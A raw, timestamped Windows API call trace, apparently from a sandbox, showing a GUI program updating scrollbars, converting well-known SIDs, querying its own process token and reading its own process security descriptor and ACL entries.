[0130.661] IsIconic (hWnd=0x9019e) returned 0
[0130.661] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.661] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.661] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] IsIconic (hWnd=0x9019e) returned 0
[0130.662] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f41c | out: lpRect=0x8f41c) returned 1
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] IsIconic (hWnd=0x9019e) returned 0
[0130.662] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] IsIconic (hWnd=0x9019e) returned 0
[0130.662] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.662] FlatSB_SetScrollProp (param_1=0x9019e, index=0x200, newValue=0x0, param_4=0) returned 0
[0130.662] GetSysColor (nIndex=20) returned 0xffffff
[0130.662] FlatSB_SetScrollProp (param_1=0x9019e, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0130.662] FlatSB_SetScrollInfo (param_1=0x9019e, code=0, psi=0x8f42a, fRedraw=1) returned 0
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] IsIconic (hWnd=0x9019e) returned 0
[0130.662] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] IsIconic (hWnd=0x9019e) returned 0
[0130.662] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.662] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.662] IsIconic (hWnd=0x9019e) returned 0
[0130.662] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.663] FlatSB_SetScrollProp (param_1=0x9019e, index=0x100, newValue=0x0, param_4=0) returned 0
[0130.663] GetSysColor (nIndex=20) returned 0xffffff
[0130.663] FlatSB_SetScrollProp (param_1=0x9019e, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0130.663] FlatSB_SetScrollInfo (param_1=0x9019e, code=1, psi=0x8f42a, fRedraw=1) returned 0
[0130.663] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.663] IsIconic (hWnd=0x9019e) returned 0
[0130.663] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.663] GetCurrentThreadId () returned 0x764
[0130.663] ConvertSidToStringSidA () returned 0x1
[0130.663] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.663] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0130.664] LocalFree (hMem=0xe6f40) returned 0x0
[0130.664] LocalFree (hMem=0xd2f90) returned 0x0
[0130.664] ConvertStringSidToSidA () returned 0x1
[0130.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29c2914, pSourceSid=0xd2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29c2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.664] IsValidSid (pSid=0x29c2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.664] ConvertSidToStringSidA () returned 0x1
[0130.664] LocalFree (hMem=0xe6f40) returned 0x0
[0130.664] LocalFree (hMem=0xd2f90) returned 0x0
[0130.664] ConvertStringSidToSidA () returned 0x1
[0130.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29c702c, pSourceSid=0xd2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29c702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.664] IsValidSid (pSid=0x29c702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.664] ConvertSidToStringSidA () returned 0x1
[0130.664] LocalFree (hMem=0xe6f40) returned 0x0
[0130.664] LocalFree (hMem=0xd2f90) returned 0x0
[0130.664] ConvertStringSidToSidA () returned 0x1
[0130.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf5a0, pSourceSid=0xd2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29cf5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.664] IsValidSid (pSid=0x29cf5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.664] ConvertSidToStringSidA () returned 0x1
[0130.664] LocalFree (hMem=0xe6f40) returned 0x0
[0130.664] LocalFree (hMem=0xd2f90) returned 0x0
[0130.664] ConvertStringSidToSidA () returned 0x1
[0130.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf614, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.664] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.664] ConvertSidToStringSidA () returned 0x1
[0130.664] LocalFree (hMem=0xe6f58) returned 0x0
[0130.664] LocalFree (hMem=0xe6f40) returned 0x0
[0130.664] ConvertStringSidToSidA () returned 0x1
[0130.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf688, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x29cf688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0130.664] IsValidSid (pSid=0x29cf688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0130.664] ConvertSidToStringSidA () returned 0x1
[0130.664] LocalFree (hMem=0xe6f58) returned 0x0
[0130.664] LocalFree (hMem=0xe6f40) returned 0x0
[0130.664] ConvertStringSidToSidA () returned 0x1
[0130.664] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf6fc, pSourceSid=0xe6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x29cf6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0130.665] IsValidSid (pSid=0x29cf6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0130.665] ConvertSidToStringSidA () returned 0x1
[0130.665] LocalFree (hMem=0xdc1c8) returned 0x0
[0130.665] LocalFree (hMem=0xe6f58) returned 0x0
[0130.665] ConvertStringSidToSidA () returned 0x1
[0130.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf770, pSourceSid=0xe6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x29cf770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0130.665] IsValidSid (pSid=0x29cf770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0130.665] ConvertSidToStringSidA () returned 0x1
[0130.665] LocalFree (hMem=0xdc1c8) returned 0x0
[0130.665] LocalFree (hMem=0xe6f70) returned 0x0
[0130.665] ConvertStringSidToSidA () returned 0x1
[0130.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf7f8, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x29cf7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0130.665] IsValidSid (pSid=0x29cf7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0130.665] ConvertSidToStringSidA () returned 0x1
[0130.665] LocalFree (hMem=0xdc1c8) returned 0x0
[0130.665] LocalFree (hMem=0xe6f40) returned 0x0
[0130.665] ConvertStringSidToSidA () returned 0x1
[0130.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf880, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x29cf880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0130.665] IsValidSid (pSid=0x29cf880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0130.665] ConvertSidToStringSidA () returned 0x1
[0130.665] LocalFree (hMem=0xe6f58) returned 0x0
[0130.665] LocalFree (hMem=0xe6f40) returned 0x0
[0130.665] ConvertStringSidToSidA () returned 0x1
[0130.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf90c, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x29cf90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0130.665] IsValidSid (pSid=0x29cf90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0130.665] ConvertSidToStringSidA () returned 0x1
[0130.665] LocalFree (hMem=0xe6f58) returned 0x0
[0130.665] LocalFree (hMem=0xe6f40) returned 0x0
[0130.665] ConvertStringSidToSidA () returned 0x1
[0130.665] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cf998, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x29cf998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0130.665] IsValidSid (pSid=0x29cf998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0130.665] ConvertSidToStringSidA () returned 0x1
[0130.665] LocalFree (hMem=0xe6f58) returned 0x0
[0130.665] LocalFree (hMem=0xe6f40) returned 0x0
[0130.665] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.666] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0130.666] GetCurrentThread () returned 0xfffffffe
[0130.666] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.666] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0130.666] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x8ecac | out: TokenHandle=0x8ecac*=0x28a3756) returned 0
[0130.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.666] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0130.666] GetCurrentProcess () returned 0xffffffff
[0130.666] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.666] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0130.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x29cfa3c | out: TokenHandle=0x29cfa3c*=0x1d0) returned 1
[0130.666] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.666] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0130.667] MapGenericMask (in: AccessMask=0x8eb24, GenericMapping=0x8eb28 | out: AccessMask=0x8eb24)
[0130.667] MapGenericMask (in: AccessMask=0x8ec58, GenericMapping=0x8ec5c | out: AccessMask=0x8ec58)
[0130.667] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.667] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0130.667] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x8ec6c | out: TokenInformation=0x0, ReturnLength=0x8ec6c) returned 0
[0130.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.667] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0130.667] GetLastError () returned 0x7a
[0130.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.667] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0130.667] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0xe0780, TokenInformationLength=0x24, ReturnLength=0x8ec90 | out: TokenInformation=0xe0780, ReturnLength=0x8ec90) returned 1
[0130.667] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfab0, pSourceSid=0xe0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x29cfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.667] IsValidSid (pSid=0x29cfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.667] ConvertSidToStringSidA () returned 0x1
[0130.667] LocalFree (hMem=0xd9e80) returned 0x0
[0130.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.668] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0130.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfb34, pSourceSid=0x29cfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x29cfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.668] IsValidSid (pSid=0x29cfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.668] ConvertSidToStringSidA () returned 0x1
[0130.668] LocalFree (hMem=0xd9e80) returned 0x0
[0130.668] IsValidSid (pSid=0x29cfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.668] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0130.668] CloseHandle (hObject=0x1d0) returned 1
[0130.668] ConvertStringSidToSidA () returned 0x1
[0130.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfa54, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x29cfa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0130.668] IsValidSid (pSid=0x29cfa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0130.668] ConvertSidToStringSidA () returned 0x1
[0130.668] LocalFree (hMem=0xe6f58) returned 0x0
[0130.668] LocalFree (hMem=0xe6f40) returned 0x0
[0130.668] ConvertStringSidToSidA () returned 0x1
[0130.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfae0, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x29cfae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0130.668] IsValidSid (pSid=0x29cfae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0130.668] ConvertSidToStringSidA () returned 0x1
[0130.668] LocalFree (hMem=0xe6f58) returned 0x0
[0130.668] LocalFree (hMem=0xe6f40) returned 0x0
[0130.668] ConvertStringSidToSidA () returned 0x1
[0130.668] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfbfc, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x29cfbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0130.668] IsValidSid (pSid=0x29cfbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0130.668] ConvertSidToStringSidA () returned 0x1
[0130.668] LocalFree (hMem=0xe6f58) returned 0x0
[0130.668] LocalFree (hMem=0xe6f40) returned 0x0
[0130.669] ConvertStringSidToSidA () returned 0x1
[0130.669] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfc8c, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x29cfc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0130.669] IsValidSid (pSid=0x29cfc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0130.669] ConvertSidToStringSidA () returned 0x1
[0130.669] LocalFree (hMem=0xe6f58) returned 0x0
[0130.669] LocalFree (hMem=0xe6f40) returned 0x0
[0130.669] ConvertStringSidToSidA () returned 0x1
[0130.669] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfd1c, pSourceSid=0xe6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x29cfd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0130.669] IsValidSid (pSid=0x29cfd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0130.669] ConvertSidToStringSidA () returned 0x1
[0130.669] LocalFree (hMem=0xe6f58) returned 0x0
[0130.669] LocalFree (hMem=0xe6f40) returned 0x0
[0130.669] GetCurrentProcessId () returned 0x824
[0130.669] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x824) returned 0x1d0
[0130.669] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.669] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0130.669] GetSecurityInfo () returned 0x0
[0130.678] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.678] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0130.678] GetSecurityDescriptorControl (in: pSecurityDescriptor=0xe0f28, pControl=0x8ea32, lpdwRevision=0x8ea2c | out: pControl=0x8ea32, lpdwRevision=0x8ea2c) returned 1
[0130.678] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.678] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0130.678] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0xe0f28, pOwner=0x8ea28, lpbOwnerDefaulted=0x8ea1c | out: pOwner=0x8ea28*=0x0, lpbOwnerDefaulted=0x8ea1c) returned 1
[0130.679] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.679] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0130.679] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0xe0f28, pGroup=0x8ea28, lpbGroupDefaulted=0x8ea1c | out: pGroup=0x8ea28*=0x0, lpbGroupDefaulted=0x8ea1c) returned 1
[0130.679] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.679] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0130.679] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0xe0f28, lpbDaclPresent=0x8ea20, pDacl=0x8ea14, lpbDaclDefaulted=0x8ea1c | out: lpbDaclPresent=0x8ea20, pDacl=0x8ea14, lpbDaclDefaulted=0x8ea1c) returned 1
[0130.679] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.679] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0130.679] IsValidAcl (pAcl=0xe0f3c) returned 1
[0130.679] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.679] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0130.679] GetAce (in: pAcl=0xe0f3c, dwAceIndex=0x0, pAce=0x8e8b4 | out: pAce=0x8e8b4*=0xe0f44) returned 1
[0130.679] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cfe74, pSourceSid=0xe0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29cfe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.679] IsValidSid (pSid=0x29cfe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.679] ConvertSidToStringSidA () returned 0x1
[0130.679] LocalFree (hMem=0xe7018) returned 0x0
[0130.679] GetAce (in: pAcl=0xe0f3c, dwAceIndex=0x1, pAce=0x8e8b4 | out: pAce=0x8e8b4*=0xe0f5c) returned 1
